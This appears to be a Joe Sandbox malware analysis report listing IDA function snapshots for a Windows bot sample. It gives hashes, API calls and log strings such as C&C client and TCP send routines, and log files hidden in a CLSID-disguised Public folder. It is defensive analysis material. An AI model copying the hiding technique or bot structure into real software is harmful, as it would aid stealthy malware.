                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                                    • API String ID: 513531256-1680544107
                                    • Opcode ID: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
                                    • Instruction ID: a352cd4d9f8634401e9838c43943f63e8c26f950c3d63abdbde572f294837968
                                    • Opcode Fuzzy Hash: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
                                    • Instruction Fuzzy Hash: 894180B1A0C6C145F7229B20FC547AE6396BB9AB80F4C45B1DA0E677A9CF3CE5818744
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                                    • API String ID: 513531256-3034662401
                                    • Opcode ID: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
                                    • Instruction ID: 3c28f99afed6d6ee0d028c4d76ea6e5bbe97e0b3f9dd33e2a14795ef0a8e6070
                                    • Opcode Fuzzy Hash: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
                                    • Instruction Fuzzy Hash: 654165B9A1C6C149F3229F31EC993BDA250BB84740F880175D9CDA7795DF2CE545C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                                    • API String ID: 513531256-2115573132
                                    • Opcode ID: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
                                    • Instruction ID: 3abbe0ff49d3f1c75cc68ccaa0537fd249cbc48bbef6d58982a0beb81f4927d5
                                    • Opcode Fuzzy Hash: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
                                    • Instruction Fuzzy Hash: 054182B1A0C6D186F326AF35EC513A96251FF96780F400131EA4DD77A5CFACEE858B00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                                    • API String ID: 513531256-2729875187
                                    • Opcode ID: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
                                    • Instruction ID: 3f556a7774ac54fe8d6e7ae3dbe908be2afe6b27c69028faa9cf9f4368d5c8a1
                                    • Opcode Fuzzy Hash: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
                                    • Instruction Fuzzy Hash: 804162E5A0DAC686F3229B31EC553AE2390BB96784F4800B1DA4D67795DF2CE6838700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                    • API String ID: 2918714741-1670302297
                                    • Opcode ID: 1b2397839485f678ec0f3a1d9c7e17f9bdb95bff4cdc42854cb50bc83c9afe9a
                                    • Instruction ID: 1a7a6cbf8d71d6ea2bf23561420fa5a73e6dc93bd3b7f90e07a9f349a97e6395
                                    • Opcode Fuzzy Hash: 1b2397839485f678ec0f3a1d9c7e17f9bdb95bff4cdc42854cb50bc83c9afe9a
                                    • Instruction Fuzzy Hash: B52194A6A08AC696E7529F35EC857AE3360BB84794F484072EECC97B54CF3CD945C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: CopyErrorFileLastfflushfwrite
                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                    • API String ID: 2887799713-3464183404
                                    • Opcode ID: 543ea350fa23192d5b054946d30ff439aeb2e3bb37d7e19dd14fcafb7c0235b7
                                    • Instruction ID: 2c07156ecb447af5f87d65c8e2d995921a62672f7e4e90237b10651d0dac5e0f
                                    • Opcode Fuzzy Hash: 543ea350fa23192d5b054946d30ff439aeb2e3bb37d7e19dd14fcafb7c0235b7
                                    • Instruction Fuzzy Hash: EA418361D0F61AC7FA34FB059400775E6547F10B8CED602BAD90F0A6B0EEADA6838735
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                    • API String ID: 2018770650-4119452840
                                    • Opcode ID: cde1f3aa83753c17a85415026754875f69a9d0e0481716f09c6b60469321574a
                                    • Instruction ID: 2282ba7d878c2e6b4e61b181c1dd0431f51ede3d548c684019d96b873fc3b6ef
                                    • Opcode Fuzzy Hash: cde1f3aa83753c17a85415026754875f69a9d0e0481716f09c6b60469321574a
                                    • Instruction Fuzzy Hash: 71310D62E0F24BC3FA71F714A54077CA1525F51358FEB06BAC91E062F2ED1DA9879322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                    • API String ID: 1802528911-690514478
                                    • Opcode ID: c4431af1e5df0fa1b77c0167f00e213902285fb8cfeb12510ea4d688c219d3ff
                                    • Instruction ID: d6bf16fe3045ff4e729232e4aed18e7447fa9d6b6911b1fb8c6b4beb6eca45bf
                                    • Opcode Fuzzy Hash: c4431af1e5df0fa1b77c0167f00e213902285fb8cfeb12510ea4d688c219d3ff
                                    • Instruction Fuzzy Hash: 0621CDD1A2818281E6228735EC906BC1642AF277F9E5C03B1DC6D666EACE2DE945C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                    • API String ID: 1802528911-690514478
                                    • Opcode ID: 5a0cdcd8f416ed66487816ec89a7f52511c8f7a9cc189daedb820147a4bc70b3
                                    • Instruction ID: fc8e6dd26f09dbb4353af06d403c11348785cd4298675adc4bb768d710a87be0
                                    • Opcode Fuzzy Hash: 5a0cdcd8f416ed66487816ec89a7f52511c8f7a9cc189daedb820147a4bc70b3
                                    • Instruction Fuzzy Hash: 5721ACDDB1859252EA264E36ED887BC52516F45BF4E5C03B1ECFC6BAD2CE2CA4068300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 563ddabfb48b2fb7adaf85913b3868276469f5da26aa7f8a09d5ab07382f0a19
                                    • Instruction ID: 0077c9263a209edd29888cd8770437ec5db1c7cef728749251ada9d4253052cf
                                    • Opcode Fuzzy Hash: 563ddabfb48b2fb7adaf85913b3868276469f5da26aa7f8a09d5ab07382f0a19
                                    • Instruction Fuzzy Hash: EB114FF1B1C58656F7129B36EC000A5A660AF8A754F104235E96EC7AB4DFBCD949CB01
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: a21834a11399443f0de9274977709dfe95cab02b693ae6e1d22ed39eea4ac6ff
                                    • Instruction ID: 8fe9edc0b7cbe39d3be86a48df5704d508a3b79c1f5fe0fa01e7cbc5954b0de7
                                    • Opcode Fuzzy Hash: a21834a11399443f0de9274977709dfe95cab02b693ae6e1d22ed39eea4ac6ff
                                    • Instruction Fuzzy Hash: 751160B1E0C59286F361AB3AED044756660AF8A754F104231EA6DC77B4DFBCD90A8B01
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
                                    • Instruction ID: b0279676bdb29b3099af39c548b54306adb614cf4f7526df999cc42e77503d58
                                    • Opcode Fuzzy Hash: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
                                    • Instruction Fuzzy Hash: 6711D3F0A1818646E312AF35EC0046D6661FF9A744F184776E96EA3BB9DF7CD509CB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 3cd94d6c356d44df4bfa6723fe0ba7b692f9cdc644e8cf44acc47bf9408d8014
                                    • Instruction ID: 912e88a04a2b9891d319ca04ba56496cfe10cb964c7b282e954cc2b124c8f5aa
                                    • Opcode Fuzzy Hash: 3cd94d6c356d44df4bfa6723fe0ba7b692f9cdc644e8cf44acc47bf9408d8014
                                    • Instruction Fuzzy Hash: 0A1196F9A0858256F3119F36FC4826D6660BF84754F1443B5E9DDA3AA4DF7CD50A8B00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 9c2fe581f74b2f5098a5e141fddf0f3e6d478d7830d01169853c6c749ca42601
                                    • Instruction ID: 97670bb3089fe0c789bad7f70561a16d69f14abb6a93dd3bbaafb0b5b96123fd
                                    • Opcode Fuzzy Hash: 9c2fe581f74b2f5098a5e141fddf0f3e6d478d7830d01169853c6c749ca42601
                                    • Instruction Fuzzy Hash: 1A11B1B0A0C58286F711AB75EC000766660AF9AB54F104231EA6ED3AB5DEBCDA4DCB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 44b27321e03e564db89bcccc0e7d5df8cb6a651859ff422f557a8e3a400490fc
                                    • Instruction ID: 2cddbbbf7b873d76a4a6c710b4f3dc57969dd331936bdb1b8e25643f9f5c6fcb
                                    • Opcode Fuzzy Hash: 44b27321e03e564db89bcccc0e7d5df8cb6a651859ff422f557a8e3a400490fc
                                    • Instruction Fuzzy Hash: 9F11B9B16185C686F3629B35EC0046D6660FF8AB54F1842B1E96D97BE4DF7CD50B8B00
                                    APIs
                                    Strings
                                    • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFB23AB34BE
                                    • routine_tx, xrefs: 00007FFB23AB34B7
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                                    • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                    • API String ID: 2539320189-3555278722
                                    • Opcode ID: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
                                    • Instruction ID: 4ad3e7c7c2553715b7c36413e0e496a6de9abd0bf2800ea5d3aa33229b247a17
                                    • Opcode Fuzzy Hash: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
                                    • Instruction Fuzzy Hash: 97311EB5A09A8286EB268F21EC8017D73A5FF56B91F0C4675CA5E637B8CF3DE5418310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                                    • API String ID: 3472027048-1600310168
                                    • Opcode ID: 84be77717edd2999c7616423ea67f6e38ab96d6a84f15685ccd8b38b8928257c
                                    • Instruction ID: 9b7de66c7f0893b2f831326a0be52d9f6d55b62de7f23f62982f15eb4ce0c8a8
                                    • Opcode Fuzzy Hash: 84be77717edd2999c7616423ea67f6e38ab96d6a84f15685ccd8b38b8928257c
                                    • Instruction Fuzzy Hash: 515130A9E0C1C345FA628F34ECC837D6251AF84355F5842B5D4EE6A5D9DF2CE8498700
                                    APIs
                                    Strings
                                    Memory Dump Source
